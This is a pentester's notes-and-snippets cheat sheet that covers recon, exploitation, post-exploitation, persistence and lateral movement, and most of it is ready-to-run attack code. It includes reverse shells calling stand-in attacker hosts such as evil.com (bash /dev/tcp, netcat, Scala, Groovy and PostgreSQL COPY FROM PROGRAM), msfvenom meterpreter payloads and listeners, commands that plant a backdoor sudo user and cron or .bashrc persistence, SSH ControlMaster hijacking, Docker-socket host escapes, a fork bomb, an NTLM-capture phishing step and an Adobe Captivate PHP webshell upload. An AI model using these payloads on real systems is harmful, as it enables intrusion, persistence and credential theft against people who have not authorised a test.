Pentesting notes and snippets

Recon

DNS Recon

https://github.com/aboul3la/Sublist3r
https://github.com/mschwager/fierce

Aquatone

https://github.com/michenriksen/aquatone
Start with discovery:

aquatone-discover --domain <target> --threads 25

Next run the scanning phase:

aquatone-scan --domain <target> --threads 25

Finish with gathering:

aquatone-gather --domain <target> --threads 25

Gathering on OSX:

Xvfb & aquatone-gather --domain <target> --threads 25

https://github.com/jhaddix/domain

Eyewitness

Single target as command line arg

Run from docker container, output results to ~/EyeWitness/results:

docker run --rm -it -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix -v ~/EyeWitness:/tmp/EyeWitness eyewitness --single http://www.google.com --headless

Read targets out of a file

  1. Put your targets in ~/EyeWitness/urls.txt
  2. Run the following command:
docker run --rm -it -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix -v ~/eyewitness:/tmp/EyeWitness eyewitness -f /tmp/EyeWitness/urls.txt --headless
  1. The Results will be in ~/EyeWitness/results.

Nmap

Host discovery

nmap -sP -oA onlineHosts <ip range>/<subnet mask>

Detailed scan

nmap -T4 -A -v -oA detailedScanResults <ip range>/subnet<mask>

-T4: Aggressive
-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity of output

Single host TCP scan:

nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA <output filename> <target>

Detailed single host TCP scan:

nmap -nvv -Pn -sSV -T1 -p$(cat <file from single host tcp scan>.xml | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA <output filename DETAILED> <target>

Single host UDP scan:

nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oA <output filename> <target>

Scan all 65535 ports

-p-

Responder

Responder can be a great tool to collect password hashes, and give you a starting point for gaining access to a system on the network.

Here's one such scenario:
https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html

Exploitation

Reverse shell in Scala:

import sys.process._
"nc -e /bin/sh evil.com 8080" !!;

Once you have the shell, run the following for a full fledged shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Some other nice ways to "upgrade" your netcat shell:
https://medium.com/bugbountywriteup/pimp-my-shell-5-ways-to-upgrade-a-netcat-shell-ecd551a180d2

Very helpful resource for testing: https://www.tutorialspoint.com/compile_scala_online.php

Post Exploitation

Linux

Access a user's env

This is incredibly useful when you find that users are storing credentials in their environment variables.
sudo su - <username>
env

Search for config files which may have cleartext passwords in them:

# This command works on linux and OSX
du -a $directory | awk '{print $2}' | grep '\.conf$'

Netcat reverse shell without -e

Create listener:
nc -lvp [port]

On the victim:

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc [attacker] [port] 1>/tmp/backpipe

Resource: https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/

Transfer file via netcat

On host to receive file:

nc -lvp [some port] > .evil.file

On host to send file

nc -w 3 [host receiving file] [some port] < evil.file

If the file is a reverse shell be sure to make it an executable on the system:

chmod +x .evil.file

Resource: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/

Introduce backdoor user

# Create evil user
useradd evil -s /bin/bash -m
# Change evil user's password
echo -e "evilpass\nevilpass" | passwd evil
# Add evil user to sudoers
echo 'evil ALL=(ALL:ALL) ALL' >> /etc/sudoers
# Give evil user ssh access
echo -e "PasswordAuthentication yes\nAllowUsers evil" >> /etc/ssh/sshd_config

To delete the backdoored user:

# Delete evil user
userdel evil
# Delete evil user from sudoers
sed -i '/evil ALL=(ALL:ALL) ALL/d' /etc/sudoers
# Delete evil user from ssh access
sed -i '/^PasswordAuthentication yes/d' /etc/ssh/sshd_config && sed -i '/^AllowUsers evil/d' /etc/ssh/sshd_config

Unix-privesc-check

Find misconfigurations, files with open permissions, etc.
Video Reference

Download it:

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh -O /tmp/upc.sh

-or-

Download and run privesc-check.sh, save output to a file, and clean up (standard):

wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz && cd /tmp && tar -xvf unix-privesc-check-1.4.tar.gz && bash /tmp/unix-privesc-check-1.4/unix-privesc-check standard | tee /tmp/output2.txt && rm /tmp/unix-privesc-check-1.4.tar.gz && rm -rf /tmp/unix-privesc-check-1.4

-or-

Download and run privesc-check.sh, save output to a file, and clean up (detailed):

wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz && cd /tmp && tar -xvf unix-privesc-check-1.4.tar.gz && bash /tmp/unix-privesc-check-1.4/unix-privesc-check detailed | tee /tmp/output2.txt && rm /tmp/unix-privesc-check-1.4.tar.gz && rm -rf /tmp/unix-privesc-check-1.4

LinEnum

Another good one to find misconfigurations, files with open permissions, etc.

Download it:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/linenum.sh

-or-

Download and run linenum, save output to a file:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/linenum.sh && bash /tmp/linenum.sh | tee /tmp/output.txt

Linuxprivchecker

Download and run linuxprivchecker.py, save output to a file:

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py -O /tmp/lpc.py && python /tmp/lpc.py | tee /tmp/output1.txt

If there are services running as privileged user, try to find existing exploits.

Good linux post exploitation resource

https://www.youtube.com/watch?v=oYHAi0cgur4

Who has logged in previously?

who, w, last

Are you in the sudoers file?

sudo -l, cat /etc/sudoers

Get network information, like open ports and their associated processes:

netstat -antup
lsof -i

Find programs with root privs:

find / -perm -04000 > programsWithRootAccess.txt

Screenshot the targets screen when you're ssh'ed into a system:

DISPLAY=:0 import -window root screenshot.jpg

Resource: https://github.com/jmatt-io/ANL-CDC/blob/master/ubuntu_ftp_secure.sh

SUID Executables

Look for SUID files:

find / -perm -u=s -type f 2>/dev/null

https://pentestlab.blog/tag/privilege-escalation/

Cracking hashes

Identify what type of hash it is with Hash ID. Once you've done this, crack it with hashcat, john, etc.

For cracking hashes in /etc/shadow

https://www.cyberciti.biz/faq/understanding-etcshadow-file/

Resource: https://www.youtube.com/watch?v=CuBX3sBeGSw

Hashcat cheatsheet

https://www.dropbox.com/s/kdklrowv683yq1a/HashcatCheatSheet.v2018.1b (2).pdf?dl=0

Lateral Movement

Hijacking SSH with Master Mode

Copy this into ~/.ssh/config for a given compromised user:

Host *
ControlMaster auto
ControlPath ~/.ssh/sockets/ssh-%r@%h:%p
ControlPersist yes

Also run this command:

mkdir ~/.ssh/sockets

Now you simply need to wait for the compromised user to ssh to another host. Once this happens, you should be able to ssh to that system without a password as that user.

Resources

https://www.defcon.org/images/defcon-15/dc15-presentations/Moore_and_Valsmith/Whitepaper/dc-15-moore_and_valsmith-WP.pdf

Docker

If you find port 2375 open on a system:

docker -H tcp://<ip of target>:2375 <docker command>

For example, to list the containers on that system:

docker -H tcp://<ip of target>:2375 ps -a

To connect to an existing container:

docker -H tcp://<ip of target>:2375 exec -it <target container> /bin/bash

To create and run a container with the host's root volume mounted:

docker -H tcp://<ip of target>:2375 run --rm -it -v /:/host ubuntu:latest chroot /host /bin/bash

To avoid having to load up a new image (assuming ubuntu:latest isn't already installed), use docker -H tcp://<ip of target>:2375 image ls to find an existing image to use.

To create a vulnerable example:

docker run -it --name=really_freaking_vulnerable_ubuntu -v /var/run/docker.sock:/var/run/docker.sock ubuntu

If you land on a container as root and you have write access to the docker socket:

# Check if you have write access:
ls -lart /var/run/docker.sock
srw-rw---- 1 root root 0 May  6 05:25 /var/run/docker.sock

Install docker:

# Ubuntu or Debian
apt update && apt install -y wget && wget -qO- https://get.docker.com | sh

Once that's installed, find an image to use with docker images, or use something simple like ubuntu:latest:
docker run -it -v /:/host <docker image to use> chroot /host /bin/bash

Alternatively, you can use the docker socket to avoid installing docker:

# Get images
curl --unix-socket /var/run/docker.sock http://docker/images/json
# Get containers
curl --unix-socket /var/run/docker.sock http://docker/containers/json

Proof of concept for exploitation: https://gitlab.com/Creased/docker-shadow/tree/master

However, this will still need to be done as the root user.

Resources

https://gitlab.com/Creased/vulnhub-docker-writeup
https://www.lvh.io/posts/dont-expose-the-docker-socket-not-even-to-a-container.html
https://www.youtube.com/watch?v=GeEW-e4LaT4&list=PLbZzXF2qC3RuL2K7KQVHe0aqdXbZC9Lnz&index=4
https://forums.docker.com/t/api-via-socket-returns-page-not-found/24682/5

Miscellaneous

Test out of bound code execution with tcpdump

Use this:
tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo -vv
in conjuction with a ping command.

Enable ssh on Kali

In /etc/ssh/sshd_config change PermitRootLogin without-password to PermitRootLogin yes
Resource: https://www.drchaos.com/enable-ssh-on-kali-linux-enable-ssh-on-kali-linux/

Command line vnc viewer on kali

vncviewer [target]::[vnc port]

Crash system as normal user with fork bomb

forkbomb(){ forkbomb | forkbomb & }; forkbomb

Resource: https://linuxconfig.org/how-to-crash-your-linux-system-with-fork-bomb

Brute force basic auth page with Hydra

hydra -V -L <list with usernames to try> -P <list with passwords to try> <target site> http-get /<path to page with auth>

Getting a shell on a PostgreSQL DB running on Linux if you have the proper access and permissions

Start by setting up a listener:

nc -lvp 8080

Connect to the postgresql DB:

psql -h <ip with db> -U <db username>

Review the access your user has with the \du command. Alternatively, you can go in blind and run a quick test (or run a test after you've established you have the proper access and permissions to do so):

CREATE OR REPLACE FUNCTION exec() RETURNS text AS $BODY$ BEGIN DROP TABLE IF EXISTS bDGhLsYPcd; CREATE TEMP TABLE bDGhLsYPcd (INPUT TEXT); COPY bDGhLsYPcd FROM PROGRAM 'pwd'; RETURN NULL; END; $BODY$ LANGUAGE plpgsql; SELECT * FROM exec(); SELECT * FROM bDGhLsYPcd;

This should give you the working directory the database is running on if all went well.

Next, get your reverse shell loaded up:

CREATE OR REPLACE FUNCTION exec() RETURNS text AS $BODY$ BEGIN DROP TABLE IF EXISTS bDGhLsYPcd; CREATE TEMP TABLE bDGhLsYPcd (INPUT TEXT); COPY bDGhLsYPcd FROM PROGRAM 'echo "bash -i >& /dev/tcp/<attack machines ip address>/8080 0>&1" >> /tmp/unfriendly.sh'; RETURN NULL; END; $BODY$ LANGUAGE plpgsql; SELECT * FROM exec(); SELECT * FROM bDGhLsYPcd;

Execute it:

CREATE OR REPLACE FUNCTION exec() RETURNS text AS $BODY$ BEGIN DROP TABLE IF EXISTS bDGhLsYPcd; CREATE TEMP TABLE bDGhLsYPcd (INPUT TEXT); COPY bDGhLsYPcd FROM PROGRAM 'bash /tmp/unfriendly.sh'; RETURN NULL; END; $BODY$ LANGUAGE plpgsql; SELECT * FROM exec(); SELECT * FROM bDGhLsYPcd;

You should have your shell.

Getting around "su: must be run from a terminal"

python -c 'import pty;pty.spawn("/bin/bash")'

Getting a shell on a Jenkins box running on Linux or OS X with access to the groovy console

Start by setting up a listener:

nc -lvp 8080

Set up a webserver using nginx, XAMPP, etc. and host a payload that could look something like this:

bash -i >& /dev/tcp/<attackers ip>/8080 0>&1

Download your reverse shell payload:

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "curl http://<attackers ip>/unfriendly.sh --output /tmp/shell".execute()
# You could also use wget
# def proc = "wget http://<attackers ip>/unfriendly.sh -O /tmp/shell".execute()
# Use --proxy=off with wget if your proxy is messing with your ability to get that code
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out&gt; $sout err&gt; $serr"

Make sure your payload is on the target system:

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "ls /tmp".execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out&gt; $sout err&gt; $serr"

Run the payload:

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "bash /tmp/shell".execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out&gt; $sout err&gt; $serr"

You should have your shell.

Jenkins on Windows

Shout out to Nick Georgieff for figuring this one out.

Quick test on the groovy console:
println '"'powershell -command "ls"'.execute().text

Once you've verified that is working, switch gears to get a meterpreter session going.

To setup the handler, start by creating an rc file so you don't need to type the commands into msfconsole every time to interact with your payload.

Create the file:
touch windows_rev_powershell_listener.rc

In windows_rev_powershell_listener.rc:

use exploit/multi/handler
set PAYLOAD cmd/windows/reverse_powershell
set LHOST <host running metasploit>
set LPORT 445
set ExitOnSession false
exploit -j -z

Run the rc file:
msfconsole -r windows_rev_powershell_listener.rc

Connect to handler from the groovy console:

String host="<host running metasploit>";
int port=445;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

At this point, you should have a meterpreter session.

Metasploit

Run exploit in the background:
exploit -j
Do not interact with a session after successful exploitation of a target:
exploit -z
You can combine them:
exploit -j -z
Persist listener if a meterpreter session dies:
set ExitOnSession false

MSFVenom

http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
http://netsec.ws/?p=331

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

To persist the file once you've uploaded it to your target in ~/.bashrc:

echo "~/.evil.file &" >> ~/.bashrc

For good measure, throw up a cronjob for every 5 minutes as well:

# write out current crontab
crontab -l > mycron
# echo new cron into cron file
echo "*/5 * * * * ~/.evil.file" >> mycron
# install new cron file
crontab mycron
rm mycron

Resource: https://stackoverflow.com/questions/878600/how-to-create-a-cron-job-using-bash-automatically-without-the-interactive-editor

Create and run listener

Create linux_rev.rc file:

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST [listener ip]
set ExitOnSession false
exploit -j -z

Run it:

msfconsole -r linux_rev.rc

64-bit exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=4444 -f exe -o evil.exe

exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=445 -f exe -o friendly.exe

exe-service

Useful when you need a running service, like for unquoted service path vulnerabilities.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=445 -f exe-service -o friendly.exe

PHP Reverse shell payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=4444 -e php/base64 -f raw > evil_file.php && sed -i '1s/^/<?php\n/' evil_file.php && sed -i -e '$a\?>' evil_file.php

PHP bind payload

msfvenom -p php/meterpreter/bind_tcp LPORT=4444 > msf_bind_shell.php

After starting the listener, upload the php code to the target server. Be sure to replace the /*<?php /**/ with <?php at the top of the file, and replace the % at the end of the file with ?>.

Once the file is uploaded, open the file on the target server. Follow this with an exploit in metasploit.

Evil encoded x64 aspx shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=4444 -e x64/xor -f aspx > shell64.aspx

Jar reverse shell

msfvenom -p java/meterpreter/reverse_tcp LHOST=<local host ip> -f raw -o /tmp/java.jar

Start listener:

msfconsole
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <local host ip>
set ExitOnSession false
exploit -j -z

Resources

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://hackernoon.com/reverse-shell-cf154dfee6bd

Powershell payload

msfvenom -p cmd/windows/reverse_powershell LHOST=<local host ip> LPORT=445 -o friendly.bat

Start listener:

msfconsole
use exploit/multi/handler
set PAYLOAD cmd/windows/reverse_powershell
set LHOST <local host ip>
set LPORT 445
set ExitOnSession false
exploit -j -z

Copy the evil code:

# On the linux machine
cat friendly.bat

Start powershell on victim:

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

Paste the evil code into the powershell terminal, or create a .bat file and run it.

Bash Reverse shell

exec 5<>/dev/tcp/<evil ip>/4444;cat <&5 | while read line; do $line 2>&5 >&5; done 

Another similar option:

exec 5<>/dev/tcp/<evil ip>/4444;while read line 0<&5; do $line 2>&5 >&5; done

Basic:

bash -i >& /dev/tcp/<evil ip>/4444 0>&1

Netcat reverse shell

On evil server: nc -lvp <port>
On victim: nc <evil server> <port> -e sh &

Resource: docker start -ai

Create RC Listener

You can create an rc file so you don't need to type the commands into msfconsole every time to interact with your payload.

Create the file:

touch listener.rc

In listener.rc:

use exploit/multi/handler
set payload <payload>
set LHOST <host running metasploit>
set LPORT <port>
set ExitOnSession false
exploit -j -z

Run the rc file:

msfconsole -r listener.rc

Capture NTLM Hash with Metasploit

Start the smb capture server:

use auxiliary/server/capture/smb
run

Get victim to connect via smb.
If they need help via phish and they're on a mac, have them open Finder, Command+k, and then type in the following:

smb://<evil server ip>

Making Firefox horribly insecure for quick and dirty proof of concepts

  1. Browse to about:config
  2. Type in security.file
  3. Double click
    security.fileuri.strict_origin_policy

This will disable the same origin policy blocks.

  1. Browse to about:config
  2. Type in security.file
  3. Double click
    security.insecure_field_warning.contextual.enabled

This will disable the "this connection is not secure" messages.

  1. Browse to about:config
  2. Type in mixed
  3. Double click security.mixed_content.block_active_content

This will disable the block active content lock.

Obviously you want to undo these changes once you've finished your POC's.

Find logs on a linux system

find . -type f -name "*.log"

Adobe Captivate Quiz Reporting Feature 'internalServerReporting.php' File Upload RCE Webshell

Using Burp, intercept a GET request to the target and throw it into repeater. Next, right click and Change request method to POST.

Here's what the request should look like:

POST /internalServerReporting.php HTTP/1.1
Host: <target running adobe captivate>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, sdch
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

CompanyName=.&DepartmentName=.&CourseName=.&Filename=test.php&Filedata=<?php

if(isset($_REQUEST['cmd'])){
	echo "<pre>";
	$cmd =($_REQUEST['cmd']);
	system($cmd);
	echo "</pre>";
	die;
}

?>

Once you've sent it and gotten a 200 back, you can access the web shell like so:

http://<target running adobe captivate>/CaptivateResults/test.php?cmd=<your command to run>

Don't forget to clean it up when you're done:

http://<target running adobe captivate>/CaptivateResults/test.php?cmd=del test.php

With Metasploit:
https://hydrasky.com/network-security/create-a-web-backdoor-payload-with-metasploit/
Create the payload:

msfvenom -p php/meterpreter/bind_tcp LPORT=4000 > backdoor.php
In php_listener.rc:

use exploit/multi/handler
set payload <payload>
set LHOST <host running metasploit>
set LPORT 4444

Run the rc file:

msfconsole -r php_listener.rc

Upload the php code to the target server. I made sure to replace the /*<?php /**/ with <?php at the top of the file, and replaced the % at the end of the file with a ?> before doing so with Burp repeater.

Once the file is uploaded, open the file on the target server. Follow this with an exploit in metasploit.

You should have a shell at this point.

Maybe give this a shot https://dl.packetstormsecurity.net/papers/attack/root3.pdf

Windows

A couple of things to try below.

# whoami
echo %USERDOMAIN%\%USERNAME%
# create user && add to Administrators
net user <username> <password> /ADD
net localgroup Administrators <username> /ADD
# list local admins
net localgroup administrators
# Look for passwords in txt, xml && xls files
findstr /si password *.txt| *.xml| *.xls
# Show open ports
netstat -bano
# Get list of domain admins
net group "Domain Admins" /domain

Enumerate missing patches on a windows machine with msf

post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester

Check for weak service permissions with accesschk (part of sysinternals)

Video reference

Information on how to download sysinternals using powershell can be found here.

accesschk.exe -qwcu "Authenticated Users" * /accepteula
accesschk.exe -qwcu "Users" * /accepteula
accesschk.exe -qwcu "Everyone" * /accepteula

Once one has been found, modify the binpath to point to the net user bin to create a rogue user:

sc config <vuln service> binpath= "net user <username> <password> /add"

Restart it:

sc start <vuln service>

Add that user to the administrators group:

sc config <vuln service> binpath= "net localgroup administrators <username> /add"

Restart it again:

sc start <vuln service>

Check for weak file permissions with accesschk (part of sysinternals)

Video reference

Information on how to download sysinternals using powershell can be found here.

accesschk.exe -qwsu "Authenticated Users" * /accepteula
accesschk.exe -qwsu "Users" * /accepteula
accesschk.exe -qwsu "Everyone" * /accepteula

Always install elevated privilege escalation

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Use metasploit if they set to exploit:

use exploit/windows/local/always_install_elevated
set LPORT 443
exploit

Use sessiongopher to find saved session info for RAT's

Grab it:

(New-Object System.Net.WebClient).DownloadFile("https://github.com/fireeye/SessionGopher/blob/master/SessionGopher.ps1","C:\Temp\SessionGopher.ps1")

Run it:

Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Thorough

Ghetto Windows WGET using cmd

bitsadmin /transfer myDownloadJob /download /priority normal http://<evil server>/evil.exe c:\temp\evil.exe

Upload stuff to a Windows machine via RDP

http://haacked.com/archive/2010/05/18/remote-desktop-file-copy.aspx/

Empire

Launch the docker container:

# Create a volume to store empire data in
docker create -v /opt/Empire --name data empireproject/empire
# Run the empire container
docker run -ti --volumes-from data -p <host ip>:80:80 empireproject/empire

Resource: http://blog.obscuritylabs.com/docker-command-controll-c2/
Create a listener:

listeners
uselistener http

Resource: http://ethicalhackingblog.com/hacking-powershell-empire-2-0/

POC creation

Unquoted Service Paths

Coldfusion resources

https://nets.ec/Coldfusion_hacking
http://breenmachine.blogspot.com/2013/03/cool-coldfusion-post-exploitation.html
https://github.com/reider-roque/pentest-tools/blob/master/shells/webshell.cfm

Resources

https://netsec.ws/?p=331
https://trustfoundry.net/practical-guide-to-exploiting-the-unquoted-service-path-vulnerability-in-windows/
https://www.gracefulsecurity.com/privesc-unquoted-service-path/
https://www.youtube.com/watch?v=PC_iMqiuIRQ
http://thepcn3rd.blogspot.com/2015/03/utilizing-powerupps1-to-escalate.html
https://twitter.com/1njected/status/875701296325697536

OSX

Reverse shell

Setup Listener:
nc -lvp 8888

Connect from OSX:
bash -i >& /dev/tcp/*attacker ip*/8888 0&>1

Setting up cloud cracking machine with Kali

https://www.kali.org/news/cloud-cracking-with-cuda-gpu/

Fix kali apt update issue

If apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6 isn't doing it, try wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add

Resources:
https://forums.kali.org/showthread.php?38858-apt-get-update-GPG-error-key-expired
https://community.spiceworks.com/topic/2110904-kali-linux-expired-signature

Fix Burpsuite in Kali

Burp does not presently (8/3/2018 is when I'm writing this) support Java 10, which is the default java on Kali at this point in time. To fix this, simply run update-alternatives --config java and then select the number that corresponds to /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java from the menu.

Mount NFS share

Show available shares:
showmount -e target.system
Make a directory to house to contents of the share locally:
mkdir /tmp/target.system
Mount the NFS share locally:
mount -t nfs target.system:/mount/path /tmp/target.system
Dismount the NFS share:
umount -f -l /tmp/target.system

Tools

Code can be found here to list mounts and review their contents:
https://gist.github.com/l50/0b71356292f2955edb33b8df42ed5c46

Resource: https://resources.infosecinstitute.com/exploiting-nfs-share/#gref